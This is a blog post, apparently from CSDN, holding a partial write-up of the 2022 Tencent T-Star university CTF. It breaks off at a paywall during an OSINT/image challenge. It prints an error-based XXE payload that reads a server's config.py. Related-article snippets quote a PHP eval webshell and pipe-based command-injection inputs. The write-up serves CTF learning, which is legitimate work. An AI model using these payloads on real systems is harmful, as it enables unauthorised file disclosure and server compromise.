t-star腾讯安全高校挑战赛2022 writeup

最新推荐文章于 2022-11-02 17:22:00 发布
最新推荐文章于 2022-11-02 17:22:00 发布
阅读量269 收藏
点赞数
分类专栏: 面试 学习路线 阿里巴巴 文章标签: java java进阶 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67392010/article/details/124777509
版权
本文详细记录了t-star腾讯安全高校挑战赛的六个赛题解题过程,涉及XXE漏洞利用、经纬度解析、安卓备份文件解密、二维码修复、音频解码和DOCX文件隐藏信息的提取。每个赛题通过分析数据包、使用各种工具及解密技巧,逐步揭示解题思路和关键步骤。
摘要由CSDN通过智能技术生成

文章目录

t-star writeup

赛题一

一个简单的验证码绕过,在包里,抓一下就可以登陆进后台了

在这里插入图片描述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-czbNhoPs-1651548387176)(t-star%20writeup%20ba9b7e3edc97424d9aff84bdfbd1c76e/Untitled%201.png)]

在进入后台后,找到了几个功能点,尝试了sql注入等,一直没成功.

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pGwH7Pqy-1651548387176)(t-star%20writeup%20ba9b7e3edc97424d9aff84bdfbd1c76e/Untitled%202.png)]

https://www.mi1k7ea.com/2019/06/27/从一道CTF题看如何利用本地DTD文件实现XXE攻击/

后面应该要用XXE漏洞,这里自己知识方面有欠缺,确实没想到这个点

不过在看到有的师傅说用XXE的时候,自己尝试了也没成功,当时是报错了,没有解决…

看wp的时候发现有的师傅通过报错找到了解决方案

参考:https://j7ur8.github.io/WebBook/VUL/%E6%8A%A5%E9%94%99XXE.html

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lJ67sH9g-1651548387176)(t-star%20writeup%20ba9b7e3edc97424d9aff84bdfbd1c76e/Untitled%203.png)]

Content-Type: application/xml;charset=UTF-8

http://175.178.148.197:5000/#/login

<!DOCTYPE message [

    <!ENTITY % aaa '

        <!ENTITY &#x25; file SYSTEM "file:///proc/self/cwd/config.py">

        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///aaa&#x25;file;&#x27;>">

        &#x25;eval;

        &#x25;error;

    '>

    %aaa;

]>

赛题二

当时在直播间网站里找到了返回主播信息的api,但是那个不对,是chengdu

瞎猜了一个腾讯总部,shenzhen…

看了wp后发现…没那么简单

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-agdRva4o-1651548387176)(t-star%20writeup%20ba9b7e3edc97424d9aff84bdfbd1c76e/Untitled%204.png)]

通过直播间id 及提示微博,找到这个用户

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dF0JnyyJ-1651548387177)(t-star%20writeup%20ba9b7e3edc97424d9aff84bdfbd1c76e/Untitled%205.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ngiYdH3d-1651548387177)(t-star%20writeup%20ba9b7e3edc97424d9aff84bdfbd1c76e/Untitled%206.png)]

这两张图片…

为啥要放两张呢,肯定有猫腻,两张图应该会不一样(找不同)

所以需要用到图片对比工具

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qGj7x3ng-1651548387177)(t-star%20writeup%20ba9b7e3edc97424d9aff84bdfbd1c76e/Untitled%207.png)]

能发现有一处不同…

最低0.47元/天 解锁文章
小芬熊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
腾讯网络安全T-Star高校挑战赛
weixin_53268624的博客
04-28 2754
腾讯网络安全T-Star高校挑战赛 菜狗的部分解题
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
腾讯T-Star高校挑战赛
Zlirving_的博客
07-01 745
0X00前言 以组队形式参加的赛事,一个月前找到了三位好友组团参赛(都是小白啦,包括我) 记录一下赛题~   0X01赛题 一、签到 —— 文件上传js绕过 Upload-labs上的第一题 首先,先上传一个正常.txt或.jpg文件测试是否能够正常上传,结果是可以正常上传。然后,再上传一个已经写好一句话木马的php文件,上传的php文件内容为:<?php eval($_POST['cmd']);?> 此时,有弹窗提示文件类型限制,上传失败。 根据经验,我们开始排查漏洞,先查看网页源
SWCTF2022Writeup
Amherstieae的博客
04-28 1229
写在前面:啊很久没有打一场完整的比赛并且复盘了,刚才得知有师傅读了我的博客学到一些新的东西啦,感觉写博客也是超有意义的一件事情,希望自己能继续坚持不懈的走下去,也算是对自己的一个勉励吧。 Game 图片在下面 下载文件附件名称为docx,那么一般文件就是一个文档,修改名称为1.docx即可看见里面正文,如下 对于docx文档有一个字体隐藏,或者是文字被改成了白色,如果有段落起止符的话可以根据这个来看,没有的话先大体看一下文字&隐藏文字 隐藏文字:选中所有文字,右击有个字体, 看这个样子就是没有了
Hackergame 2022 Writeup(来自一位啥都不会的萌新)
wohohohoho的博客
10-29 1871
第一次写writeup有不足之处请见谅(
腾讯犀牛鸟网络安全T-Star高校挑战赛writeup
qq_42188168的博客
06-30 798
高校组 今天你吃了吗战队WRITEUP 三、 解题过程 题目一 签到 操作内容: Js检测,禁用js即可上传 http://588f25a5.yunyansec.com/upload/2.php 蚁剑连接即可 如该题使用自己编写的脚本请详细写出,不允许截图 flag值: key{K735c9f0D7ddc3b9} 题目二 命令执行基础 操作内容: 命令执行payload:127.0.0.1|ls … 127.0.0.1|cat …/key.php 如该题使用自己编写的脚本请详细写出,不允许截图 flag值:
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1 本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们...
MatchModels:2019中国高校计算机大赛-大数据挑战赛第15名WriteUp
03-10
2019中国高校计算机大赛-大数据挑战赛WriteUp 赛题: 我们是最终排名第15名的改革春风吹满地队伍,对方法和模型进行了简单的整理。 传统模型 查询和标题去重 训练词向量以及词频统计是query和title需做去重处理 图...
2024 高校网络安全管理运维赛 Writeup.pdf
最新发布
05-16
2024 高校网络安全管理运维赛 Writeup.pdf
2022HFCTF-线上赛官方Writeup1
08-04
在HFCTF 2022线上赛中,参赛者面临了一系列挑战,涵盖了网络安全的多个领域,包括Web安全、加密、逆向工程等。这里我们将深入探讨其中涉及到的一些关键技术点。 首先,描述中提到了“RSA 公钥解密”,这涉及到非...
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1
2022强国杯writeup
07-17
2022强国杯writeup
祥云杯2022 writeup
渗透测试研究中心
11-02 1959
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
极客少年挑战赛2022 writeup by 树木
JEWSWS的博客
08-25 874
最近强网杯什么的虽然打了,但是排名太低了,写出来怕师傅们笑话qwq这次写个简单点的WriteUP,嘿嘿嘿。
CCS 2022 极客少年挑战赛 writeup
zx66661的博客
08-24 748
CCS 2022 极客少年挑战赛 writeup
2022DASCTF MAY 出题人挑战赛 Writeup
末初的CSDN博客
05-23 976
2022DASCTF MAY 出题人挑战赛 Writeup
2022年川渝网络与信息安全职业技能竞赛-个人初赛writeup
渗透测试研究中心
09-14 1063
1.Web 1-1:题目名称:目录扫描 Flag: DASCTF{84a70245035ca88088a2ba6ae2378021} 1-3:题目名称:MissingData 主要就是开头ob_start();所以所有输出都会存到缓冲区,用户手动取输出 所以文件名$this->LOG_NAME由hello获得: $hello = $_GET['hello']; echo $hello...
2022某省网络安全管理员职业技能大赛个人Writeup及日历密码原理
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
09-01 1467
2022年某省网络安全管理员职业技能大赛个人Writeup
第二届强网杯网络安全挑战赛Writeup
"这篇资源是关于第二届强网杯全国网络安全挑战赛Writeup,涵盖了多个关卡的解题策略和技巧。" 在本次网络安全挑战赛中,参赛者需要解决一系列网络安全问题,这些问题涉及到图像隐写术、密码学、程序逆向工程以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值